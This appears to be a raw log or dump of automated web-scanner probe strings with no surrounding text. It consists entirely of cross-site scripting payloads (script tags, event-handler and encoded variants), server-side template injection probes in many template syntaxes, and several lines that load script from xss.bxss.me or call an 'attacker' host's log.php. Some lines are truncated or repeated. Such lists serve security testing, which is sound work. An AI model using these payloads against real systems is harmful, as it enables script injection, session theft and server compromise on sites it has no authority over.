555}body{zzz:Expre/**/SSion(sEMM(9722))}

555<a48aS4R<

555\u003CScRiPt\BvY8(9298)\u003C/sCripT\u003E

555<iframe src='data:text/html

555<img src=//xss.bxss.me/t/dot.gif onload=MttZ(9298)>

555<img src=xyz OnErRor=fN18(9312)>

%35%35%35%3C%53%63%52%69%50%74%20%3E%76%31%77%7A%289700%29%3C%2F%73%43%72%69%70%54%3E

%35%35%35%3C%53%63%52%69%50%74%20%3E%7A%71%76%66%289145%29%3C%2F%73%43%72%69%70%54%3E

555<body onload=xNzV(9905)>

555<img src=xyz OnErRor=MttZ(9243)>

555<aCYi4a7<

555zg4lu <ScRiPt >sEMM(9600)</ScRiPt>

555<ifRAme sRc=9354.com></IfRamE>

555<aQqL6iq<

555&lt

555<img/src=">" onerror=alert(9650)>

555<img/src=">" onerror=alert(9438)>

555\u003CScRiPt\7Pbf(9851)\u003C/sCripT\u003E

555\u003CScRiPt\zqvf(9994)\u003C/sCripT\u003E

555<aeCtiXs x=9802>

\xf6<img zzz onmouseover=BvY8(96491) //\xf6>

555<img src=//xss.bxss.me/t/dot.gif onload=xNzV(9209)>

555<img/src=">" onerror=alert(9595)>

555<WBXIDA>V1N2D[!+!]</WBXIDA>

555\u003CScRiPt\v1wz(9954)\u003C/sCripT\u003E

555'"()&%<zzz><ScRiPt >0NOx(9756)</ScRiPt>

555'"()&%<zzz><ScRiPt >3Vbp(9986)</ScRiPt>

555'"()&%<zzz><ScRiPt >4AN0(9093)</ScRiPt>

%35%35%35%3C%53%63%52%69%50%74%20%3E%6A%70%4C%68%289142%29%3C%2F%73%43%72%69%70%54%3E

555'"()&%<zzz><ScRiPt >RyNZ(9864)</ScRiPt>

%35%35%35%3C%53%63%52%69%50%74%20%3E%66%4E%31%38%289329%29%3C%2F%73%43%72%69%70%54%3E

555<ifRAme sRc=9667.com></IfRamE>

555&lt

555'"()&%<zzz><ScRiPt >P2YZ(9395)</ScRiPt>

555<input autofocus onfocus=BvY8(9227)>

555&lt

%35%35%35%3C%53%63%52%69%50%74%20%3E%4D%74%74%5A%289325%29%3C%2F%73%43%72%69%70%54%3E

555<img sRc='http://attacker-9496/log.php?

555<img src=xyz OnErRor=xNzV(9107)>

555&lt

'"()&%<zzz><ScRiPt >4AN0(9370)</ScRiPt>

'"()&%<zzz><ScRiPt >P2YZ(9048)</ScRiPt>

555\u003CScRiPt\fN18(9284)\u003C/sCripT\u003E

'"()&%<zzz><ScRiPt >0NOx(9629)</ScRiPt>

'"()&%<zzz><ScRiPt >RyNZ(9043)</ScRiPt>

\xf6<img zzz onmouseover=7Pbf(92831) //\xf6>

555'"()&%<zzz><ScRiPt >rIEc(9652)</ScRiPt>

555<aktRHXW x=9231>

5559421904

\xf6<img zzz onmouseover=zqvf(95061) //\xf6>

'"()&%<zzz><ScRiPt >3Vbp(9471)</ScRiPt>

555<img/src=">" onerror=alert(9431)>

555'"()&%<zzz><ScRiPt >n44n(9632)</ScRiPt>

<a HrEF=http://xss.bxss.me></a>

'"()&%<zzz><ScRiPt >rIEc(9442)</ScRiPt>

555<input autofocus onfocus=7Pbf(9715)>

555\u003CScRiPt\jpLh(9617)\u003C/sCripT\u003E

\xf6<img zzz onmouseover=v1wz(95791) //\xf6>

555\u003CScRiPt\MttZ(9576)\u003C/sCripT\u003E

555<a0E1bsk<

555<img sRc='http://attacker-9543/log.php?

555'"()&%<zzz><ScRiPt >oswf(9242)</ScRiPt>

5559426792

'"()&%<zzz><ScRiPt >n44n(9606)</ScRiPt>

5559778682

%35%35%35%3C%53%63%52%69%50%74%20%3E%78%4E%7A%56%289166%29%3C%2F%73%43%72%69%70%54%3E

<a HrEF=jaVaScRiPT:>

5559714913

bfg10167\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl10167

5559169778

<a HrEF=http://xss.bxss.me></a>

555<input autofocus onfocus=zqvf(9850)>

5559968596

<a HrEF=http://xss.bxss.me></a>

555<aytbuMo<

555&lt

555&lt

bfg8123\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl8123

bfg8838\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl8838

'"()&%<zzz><ScRiPt >oswf(9781)</ScRiPt>

555&lt

5559990755

555\u003CScRiPt\xNzV(9564)\u003C/sCripT\u003E

bfg9173\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl9173

bfgx8205\xc0\xbez1\xc0\xbcz2a\x90bcxhjl8205

bfg5366\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl5366

555<input autofocus onfocus=v1wz(9938)>

555}body{zzz:Expre/**/SSion(BvY8(9482))}

<a HrEF=jaVaScRiPT:>

\xf6<img zzz onmouseover=fN18(95981) //\xf6>

bfgx10295\xc0\xbez1\xc0\xbcz2a\x90bcxhjl10295

555&lt

bfg2663\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl2663

5559158456

bfg3585\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl3585

<%={{={@{#{${dfb}}%>

\xf6<img zzz onmouseover=jpLh(90441) //\xf6>

<a HrEF=jaVaScRiPT:>

\xf6<img zzz onmouseover=MttZ(93471) //\xf6>

bfgx3440\xc0\xbez1\xc0\xbcz2a\x90bcxhjl3440

555ZcFqY <ScRiPt >BvY8(9775)</ScRiPt>

<a HrEF=http://xss.bxss.me></a>

bfgx10642\xc0\xbez1\xc0\xbcz2a\x90bcxhjl10642

555<input autofocus onfocus=MttZ(9670)>

555<input autofocus onfocus=jpLh(9001)>

bfgx1233\xc0\xbez1\xc0\xbcz2a\x90bcxhjl1233

bfgx1257\xc0\xbez1\xc0\xbcz2a\x90bcxhjl1257

bfg2690\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl2690

bfgx4903\xc0\xbez1\xc0\xbcz2a\x90bcxhjl4903

<%={{={@{#{${dfb}}%>

555<input autofocus onfocus=fN18(9568)>

555}body{zzz:Expre/**/SSion(7Pbf(9748))}

555

\xf6<img zzz onmouseover=xNzV(96241) //\xf6>

555<WMMJEL>MAVZO[!+!]</WMMJEL>

<a HrEF=http://xss.bxss.me></a>

555}body{zzz:Expre/**/SSion(zqvf(9310))}

<a HrEF=jaVaScRiPT:>

<%={{={@{#{${dfb}}%>

<%={{={@{#{${dfb}}%>

<%={{={@{#{${dfb}}%>

bfgx1432\xc0\xbez1\xc0\xbcz2a\x90bcxhjl1432

<%={{={@{#{${dfb}}%>

555

<a HrEF=http://xss.bxss.me></a>

<a HrEF=http://xss.bxss.me></a>

555

555hbUsW <ScRiPt >7Pbf(9805)</ScRiPt>

555<input autofocus onfocus=xNzV(9242)>

555

<th:t="${dfb}#foreach

<a HrEF=jaVaScRiPT:>

<a HrEF=jaVaScRiPT:>

555

<th:t="${dfb}#foreach

<%={{={@{#{${dfb}}%>

555pGwNi <ScRiPt >zqvf(9292)</ScRiPt>

555}body{zzz:Expre/**/SSion(v1wz(9501))}

<a HrEF=jaVaScRiPT:>

<a HrEF=http://xss.bxss.me></a>

555<WABDJD>5I2LS[!+!]</WABDJD>

<th:t="${dfb}#foreach

555<ifRAme sRc=9585.com></IfRamE>

<th:t="${dfb}#foreach

<%={{={@{#{${dfb}}%>

555}body{zzz:Expre/**/SSion(fN18(9308))}

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555

<a HrEF=jaVaScRiPT:>

555<WYC03S>9NAZ1[!+!]</WYC03S>

555GwG3I <ScRiPt >v1wz(9934)</ScRiPt>

<th:t="${dfb}#foreach

555

555

dfb{{98991*97996}}xca

555k5mE2 <ScRiPt >fN18(9135)</ScRiPt>

555}body{zzz:Expre/**/SSion(MttZ(9256))}

555

555<ifRAme sRc=9962.com></IfRamE>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555

555<aEEDGML x=9982>

dfb{{98991*97996}}xca

<th:t="${dfb}#foreach

555<ifRAme sRc=9371.com></IfRamE>

555}body{zzz:Expre/**/SSion(jpLh(9225))}

555hHCX0 <ScRiPt >MttZ(9924)</ScRiPt>

555}body{zzz:Expre/**/SSion(xNzV(9552))}

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

dfb{{98991*97996}}xca

555<WKQNAZ>DTTGW[!+!]</WKQNAZ>

555

555

dfb[[${98991*97996}]]xca

555<img sRc='http://attacker-9656/log.php?

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<WMUWBK>PBME6[!+!]</WMUWBK>

<th:t="${dfb}#foreach

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555gVwPm <ScRiPt >jpLh(9109)</ScRiPt>

"}}dfb{{98991*97996}}xca

dfb__${98991*97996}__::.x

555O0Q9d <ScRiPt >xNzV(9035)</ScRiPt>

555<adVZLj7 x=9960>

555

555

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<ar5bRvP<

555

dfb{98991*97996}xca

555<aNFdcW8 x=9478>

555<WXTK4O>NYFDJ[!+!]</WXTK4O>

555<ifRAme sRc=9592.com></IfRamE>

555<ifRAme sRc=9916.com></IfRamE>

555

"%}dfb{{98991*97996}}xca

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<img sRc='http://attacker-9063/log.php?

"}}dfb{{98991*97996}}xca

555

555<WHTVMA>K3OSN[!+!]</WHTVMA>

555<W3IZAW>JSS8P[!+!]</W3IZAW>

555<img sRc='http://attacker-9378/log.php?

555<axk5zUW<

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

dfb{{98991*97996}}xca

dfb{{98991*97996}}xca

555<aKBFPEV x=9479>

"%}dfb{{98991*97996}}xca

555<ifRAme sRc=9664.com></IfRamE>

555<ScRiPt >P2YZ(9271)</ScRiPt>

555<aUkTQZm x=9441>

dfb${98991*97996}xca

"}dfb{98991*97996}xca

555<ifRAme sRc=9640.com></IfRamE>

555<ifRAme sRc=9010.com></IfRamE>

dfb{{98991*97996}}xca

555<ar4CmcK<

555<asdGpoe x=9666>

555<img sRc='http://attacker-9587/log.php?

dfb[[${98991*97996}]]xca

555<WAPAVO>4LGO8[!+!]</WAPAVO>

"}dfb{98991*97996}xca

dfb#{98991*97996}xca

555<img sRc='http://attacker-9876/log.php?

555

dfb[[${98991*97996}]]xca

555<aYgjiNT x=9895>

"}dfb${98991*97996}xca

555<img sRc='http://attacker-9002/log.php?

555<awd0xGx x=9895>

dfb{#98991*97996}xca

"}dfb${98991*97996}xca

555<script>P2YZ(9702)</script>

555<a1GmSeL<

dfb[[${98991*97996}]]xca

555<img sRc='http://attacker-9066/log.php?

555<aUFzXPi<

"}dfb#{98991*97996}xca

"}dfb#{98991*97996}xca

dfb{@98991*97996}xca

dfb__${98991*97996}__::.x

555<script>P2YZ(9761)</script>9761

dfb{{98991*97996}}xca

555<aBT5MF6<

dfb__${98991*97996}__::.x

555<img sRc='http://attacker-9925/log.php?

555<ScR<ScRiPt>IpT>P2YZ(9471)</sCr<ScRiPt>IpT>

dfb__${98991*97996}__::.x

555<aVwGdeE<

"}dfb{#98991*97996}xca

"}dfb{#98991*97996}xca

dfb[[${98991*97996}]]xca

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<ScRiPt >P2YZ(9922)</ScRiPt>

dfb{{=98991*97996}}xca

555<aQmbZLH<

"}dfb{@98991*97996}xca

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9305></ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

"}dfb{@98991*97996}xca

555<ScRiPt >4AN0(9052)</ScRiPt>

dfb__${98991*97996}__::.x

"}}dfb{{=98991*97996}}xca

555'"()&%<zzz><ScRiPt >DW9d(9644)</ScRiPt>

555'"()&%<zzz><ScRiPt >Vb8t(9099)</ScRiPt>

555'"()&%<zzz><ScRiPt >Rn7L(9571)</ScRiPt>

555'"()&%<zzz><ScRiPt >gzwv(9473)</ScRiPt>

555<ScRiPt >P2YZ(9456)</ScRiPt>

555'"()&%<zzz><ScRiPt >DsuV(9718)</ScRiPt>

555'"()&%<zzz><ScRiPt >8JQq(9194)</ScRiPt>

555'"()&%<zzz><ScRiPt >gSCX(9014)</ScRiPt>

555'"()&%<zzz><ScRiPt >OBma(9617)</ScRiPt>

555<ScRiPt >3Vbp(9296)</ScRiPt>

555<WM8HXQ>PLJEA[!+!]</WM8HXQ>

"}}dfb{{=98991*97996}}xca

555<ScRiPt >rIEc(9684)</ScRiPt>

dfb@(98991*97996)xca

")dfb@(98991*97996)xca

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

'"()&%<zzz><ScRiPt >DW9d(9450)</ScRiPt>

555'"()&%<zzz><ScRiPt >dGnL(9207)</ScRiPt>

'"()&%<zzz><ScRiPt >8JQq(9928)</ScRiPt>

555'"()&%<zzz><ScRiPt >R9oE(9824)</ScRiPt>

555<svg  \xa0onload=P2YZ(9825)

555'"()&%<zzz><ScRiPt >Chml(9956)</ScRiPt>

555'"()&%<zzz><ScRiPt >BLFx(9891)</ScRiPt>

'"()&%<zzz><ScRiPt >Rn7L(9946)</ScRiPt>

'"()&%<zzz><ScRiPt >Vb8t(9745)</ScRiPt>

'"()&%<zzz><ScRiPt >gzwv(9565)</ScRiPt>

'"()&%<zzz><ScRiPt >OBma(9694)</ScRiPt>

'"()&%<zzz><ScRiPt >DsuV(9887)</ScRiPt>

555<script>4AN0(9687)</script>

555<ScRiPt >oswf(9440)</ScRiPt>

'"()&%<zzz><ScRiPt >gSCX(9673)</ScRiPt>

555<WQIXXX>R58GG[!+!]</WQIXXX>

555<WV0NP8>DCCVX[!+!]</WV0NP8>

555'"()&%<zzz><ScRiPt >ywDF(9607)</ScRiPt>

dfb<%=98991*97996%>xca

555'"()&%<zzz><ScRiPt >41MI(9881)</ScRiPt>

'"()&%<zzz><ScRiPt >dGnL(9921)</ScRiPt>

")dfb@(98991*97996)xca

5559917569

"%>dfb<%=98991*97996%>xca

5559461080

555'"()&%<zzz><ScRiPt >3LuS(9509)</ScRiPt>

'"()&%<zzz><ScRiPt >Chml(9598)</ScRiPt>

'"()&%<zzz><ScRiPt >BLFx(9285)</ScRiPt>

5559453357

555'"()&%<zzz><ScRiPt >juyC(9554)</ScRiPt>

555<isindex type=image src=1 onerror=P2YZ(9250)>

'"()&%<zzz><ScRiPt >R9oE(9510)</ScRiPt>

555<WT0WNP>T1PJR[!+!]</WT0WNP>

"%>dfb<%=98991*97996%>xca

bfg8540\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl8540

555<script>3Vbp(9176)</script>

5559463274

5559475111

555<script>rIEc(9872)</script>

5559732833

5559058042

555<script>4AN0(9716)</script>9716

dfb#set($x=98991*97996)${x}xca

5559852900

'"()&%<zzz><ScRiPt >ywDF(9826)</ScRiPt>

5559725069

'"()&%<zzz><ScRiPt >41MI(9445)</ScRiPt>

"}dfb#set($x=98991*97996)${x}xca

'"()&%<zzz><ScRiPt >3LuS(9889)</ScRiPt>

5559937836

bfg7834\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl7834

'"()&%<zzz><ScRiPt >juyC(9907)</ScRiPt>

555<ScR<ScRiPt>IpT>4AN0(9507)</sCr<ScRiPt>IpT>

bfg9632\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl9632

bfg7947\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl7947

5559409381

bfg9704\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl9704

bfg5945\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl5945

dfb{{"abc"|title}}xca

555<script>oswf(9901)</script>

"}dfb#set($x=98991*97996)${x}xca

bfg2627\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl2627

555<iframe src='data:text/html

5559082532

5559476786

bfgx2858\xc0\xbez1\xc0\xbcz2a\x90bcxhjl2858

555'"()&%<zzz><ScRiPt >Yu7W(9509)</ScRiPt>

bfg5971\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl5971

555<script>3Vbp(9149)</script>9149

555<script>rIEc(9237)</script>9237

"}dfb{{"abc"|title}}xca

bfgx3933\xc0\xbez1\xc0\xbcz2a\x90bcxhjl3933

bfg6553\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl6553

5559308999

5559032675

5559270404

"}dfb{{"abc"|title}}xca

bfg8029\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl8029

<%={{={@{#{${dfb}}%>

555'"()&%<zzz><ScRiPt >C2iz(9710)</ScRiPt>

555<ScRiPt >4AN0(9615)</ScRiPt>

555<body onload=P2YZ(9571)>

bfg6552\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl6552

print("dfb" . 98991*97996 . "xca")

bfgx10629\xc0\xbez1\xc0\xbcz2a\x90bcxhjl10629

bfg7110\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl7110

bfg6015\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl6015

<%={{={@{#{${dfb}}%>

bfgx8200\xc0\xbez1\xc0\xbcz2a\x90bcxhjl8200

bfgx7471\xc0\xbez1\xc0\xbcz2a\x90bcxhjl7471

bfgx6621\xc0\xbez1\xc0\xbcz2a\x90bcxhjl6621

555<script>oswf(9638)</script>9638

bfgx9068\xc0\xbez1\xc0\xbcz2a\x90bcxhjl9068

bfgx3486\xc0\xbez1\xc0\xbcz2a\x90bcxhjl3486

555<ScR<ScRiPt>IpT>3Vbp(9493)</sCr<ScRiPt>IpT>

bfg7578\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl7578

'"()&%<zzz><ScRiPt >C2iz(9920)</ScRiPt>

'"()&%<zzz><ScRiPt >Yu7W(9077)</ScRiPt>

bfg2264\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl2264

555<img src=//xss.bxss.me/t/dot.gif onload=P2YZ(9714)>

"print("dfb" . 98991*97996 . "xca")

bfg5400\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl5400

"print("dfb" . 98991*97996 . "xca")

555'"()&%<zzz><ScRiPt >T1o9(9216)</ScRiPt>

555<ScR<ScRiPt>IpT>rIEc(9137)</sCr<ScRiPt>IpT>

bfgx6083\xc0\xbez1\xc0\xbcz2a\x90bcxhjl6083

<th:t="${dfb}#foreach

bfgx3715\xc0\xbez1\xc0\xbcz2a\x90bcxhjl3715

98991*97996*98991*97996

<%={{={@{#{${dfb}}%>

"98991*97996*98991*97996

bfgx5138\xc0\xbez1\xc0\xbcz2a\x90bcxhjl5138

"98991*97996*98991*97996

<%={{={@{#{${dfb}}%>

<%={{={@{#{${dfb}}%>

555<ScRiPt >rIEc(9387)</ScRiPt>

555<img src=xyz OnErRor=P2YZ(9350)>

555<ScR<ScRiPt>IpT>oswf(9962)</sCr<ScRiPt>IpT>

bfgx2596\xc0\xbez1\xc0\xbcz2a\x90bcxhjl2596

bfgx6103\xc0\xbez1\xc0\xbcz2a\x90bcxhjl6103

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9626></ScRiPt>

555<ScRiPt >3Vbp(9710)</ScRiPt>

<%={{={@{#{${dfb}}%>

bfgx5059\xc0\xbez1\xc0\xbcz2a\x90bcxhjl5059

555

<%={{={@{#{${dfb}}%>

'"()&%<zzz><ScRiPt >T1o9(9225)</ScRiPt>

5559462942

<%={{={@{#{${dfb}}%>

bfgx10644\xc0\xbez1\xc0\xbcz2a\x90bcxhjl10644

bfgx8621\xc0\xbez1\xc0\xbcz2a\x90bcxhjl8621

<%={{={@{#{${dfb}}%>

5559291659

555

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9904></ScRiPt>

<%={{={@{#{${dfb}}%>

555

<%={{={@{#{${dfb}}%>

dfb{@math key=98991 method="multiply" operand=97996/}xca

555

555<img/src=">" onerror=alert(9740)>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9996></ScRiPt>

"}dfb{@math key=98991 method="multiply" operand=97996/}xca

bfg10343\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl10343

<%={{={@{#{${dfb}}%>

555

<%={{={@{#{${dfb}}%>

"}dfb{@math key=98991 method="multiply" operand=97996/}xca

<th:t="${dfb}#foreach

555<ScRiPt >oswf(9117)</ScRiPt>

555

<%={{={@{#{${dfb}}%>

<%={{={@{#{${dfb}}%>

555

5559462671

555

555<ScRiPt >3Vbp(9631)</ScRiPt>

<%={{={@{#{${dfb}}%>

555

555

<th:t="${dfb}#foreach

dfb{{{this}}}xca

"}}}dfb{{{this}}}xca

555<ScRiPt >4AN0(9857)</ScRiPt>

555

<th:t="${dfb}#foreach

bfg9382\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl9382

555<svg  \xa0onload=3Vbp(9175)

555

555

"}}}dfb{{{this}}}xca

bfgx6473\xc0\xbez1\xc0\xbcz2a\x90bcxhjl6473

555

<th:t="${dfb}#foreach

<th:t="${dfb}#foreach

<th:t="${dfb}#foreach

555<ScRiPt >rIEc(9756)</ScRiPt>

<th:t="${dfb}#foreach

555

%35%35%35%3C%53%63%52%69%50%74%20%3E%50%32%59%5A%289006%29%3C%2F%73%43%72%69%70%54%3E

bfg6786\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl6786

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9318></ScRiPt>

bfgx5567\xc0\xbez1\xc0\xbcz2a\x90bcxhjl5567

555

<th:t="${dfb}#foreach

<th:t="${dfb}#foreach

555\u003CScRiPt\P2YZ(9053)\u003C/sCripT\u003E

555

bfgx7307\xc0\xbez1\xc0\xbcz2a\x90bcxhjl7307

<th:t="${dfb}#foreach

555<svg  \xa0onload=rIEc(9342)

555

<%={{={@{#{${dfb}}%>

555

555

555<isindex type=image src=1 onerror=3Vbp(9690)>

#{98991*97996*98991*97996}

"}#{98991*97996*98991*97996}

"}#{98991*97996*98991*97996}

<th:t="${dfb}#foreach

<th:t="${dfb}#foreach

<th:t="${dfb}#foreach

555

555<ScRiPt >oswf(9001)</ScRiPt>

555

<th:t="${dfb}#foreach

555

555<isindex type=image src=1 onerror=rIEc(9317)>

555<svg  \xa0onload=4AN0(9201)

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555

555

555<iframe src='data:text/html

<%={{={@{#{${dfb}}%>

<th:t="${dfb}#foreach

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

<%={{={@{#{${dfb}}%>

"}dfb#{xca}=123

555

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<svg  \xa0onload=oswf(9478)

555<iframe src='data:text/html

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

dfb{{98991*97996}}xca

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

dfb#{xca}=123

555

555&lt

555

555<isindex type=image src=1 onerror=4AN0(9322)>

555

555

555

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

"}dfb#{xca}=123

555

555

555

555<isindex type=image src=1 onerror=oswf(9935)>

dfb[[${98991*97996}]]xca

555

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<body onload=3Vbp(9165)>

555

555

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<body onload=rIEc(9572)>

555<iframe src='data:text/html

555

555

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

dfb{{'abcd'.toUpperCase()}}xca

"}}dfb{{'abcd'.toUpperCase()}}xca

555

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

\xf6<img zzz onmouseover=P2YZ(96501) //\xf6>

<th:t="${dfb}#foreach

"}}dfb{{'abcd'.toUpperCase()}}xca

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

<th:t="${dfb}#foreach

555

dfb{{98991*97996}}xca

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<iframe src='data:text/html

dfb{{98991*97996}}xca

"}}AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA

555<img src=//xss.bxss.me/t/dot.gif onload=rIEc(9770)>

dfb{{98991*97996}}xca

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<input autofocus onfocus=P2YZ(9535)>

555

AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA

dfb{{98991*97996}}xca

dfb__${98991*97996}__::.x

dfb{{98991*97996}}xca

555

dfb{{98991*97996}}xca

<th:t="${dfb}#foreach

555<img src=//xss.bxss.me/t/dot.gif onload=3Vbp(9658)>

555

555

555

dfb{{98991*97996}}xca

dfb{{98991*97996}}xca

555<body onload=4AN0(9010)>

dfb{{98991*97996}}xca

"}}AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA

dfb[[${98991*97996}]]xca

555

555<body onload=oswf(9948)>

dfb{{98991*97996}}xca

555

555

<a HrEF=http://xss.bxss.me></a>

555<img src=xyz OnErRor=3Vbp(9708)>

dfb{{98991*97996}}xca

dfb[[${98991*97996}]]xca

dfb[[${98991*97996}]]xca

dfb[[${98991*97996}]]xca

555<img src=xyz OnErRor=rIEc(9529)>

dfb{{98991*97996}}xca

dfb[[${98991*97996}]]xca

dfb[[${98991*97996}]]xca

dfb{{98991*97996}}xca

dfb{{98991*97996}}xca

"}}dfb{{98991*97996}}xca

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555

dfb[[${98991*97996}]]xca

555<img/src=">" onerror=alert(9642)>

"}}dfb{{98991*97996}}xca

"}}dfb{{98991*97996}}xca

dfb[[${98991*97996}]]xca

555<img src=//xss.bxss.me/t/dot.gif onload=4AN0(9029)>

dfb__${98991*97996}__::.x

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

dfb__${98991*97996}__::.x

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

dfb[[${98991*97996}]]xca

dfb[[${98991*97996}]]xca

555<img src=//xss.bxss.me/t/dot.gif onload=oswf(9150)>

555<img/src=">" onerror=alert(9692)>

dfb[[${98991*97996}]]xca

<a HrEF=jaVaScRiPT:>

dfb{{98991*97996}}xca

dfb[[${98991*97996}]]xca

"}dfb[[${98991*97996}]]xca

dfb__${98991*97996}__::.x

"}dfb[[${98991*97996}]]xca

dfb__${98991*97996}__::.x

dfb[[${98991*97996}]]xca

dfb__${98991*97996}__::.x

dfb__${98991*97996}__::.x

%35%35%35%3C%53%63%52%69%50%74%20%3E%33%56%62%70%289321%29%3C%2F%73%43%72%69%70%54%3E

555

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<img src=xyz OnErRor=oswf(9762)>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb__${98991*97996}__::.x

dfb__${98991*97996}__::.x

555<ScRiPt >Vb8t(9276)</ScRiPt>

dfb__${98991*97996}__::.x

dfb__${98991*97996}__::.x

555<img src=xyz OnErRor=4AN0(9317)>

555}body{zzz:Expre/**/SSion(P2YZ(9654))}

555

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb[[${98991*97996}]]xca

%35%35%35%3C%53%63%52%69%50%74%20%3E%72%49%45%63%289618%29%3C%2F%73%43%72%69%70%54%3E

"dfb__${98991*97996}__::.x

dfb__${98991*97996}__::.x

dfb[[${98991*97996}]]xca

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

"%}dfb{{98991*97996}}xca

dfb__${98991*97996}__::.x

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb{{98991*97996}}xca

555<ScRiPt >Chml(9811)</ScRiPt>

555<ScRiPt >DsuV(9108)</ScRiPt>

dfb{{98991*97996}}xca

555<img/src=">" onerror=alert(9417)>

555EtTvg <ScRiPt >P2YZ(9095)</ScRiPt>

dfb__${98991*97996}__::.x

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

"dfb__${98991*97996}__::.x

555\u003CScRiPt\3Vbp(9368)\u003C/sCripT\u003E

555<WVHBZD>5V1CP[!+!]</WVHBZD>

555<img/src=">" onerror=alert(9070)>

555\u003CScRiPt\rIEc(9925)\u003C/sCripT\u003E

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555

"}"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb[[${98991*97996}]]xca

555&lt

555<ScRiPt >OBma(9505)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb__${98991*97996}__::.x

555<ScRiPt >DW9d(9303)</ScRiPt>

555<W0VFOZ>XIMKI[!+!]</W0VFOZ>

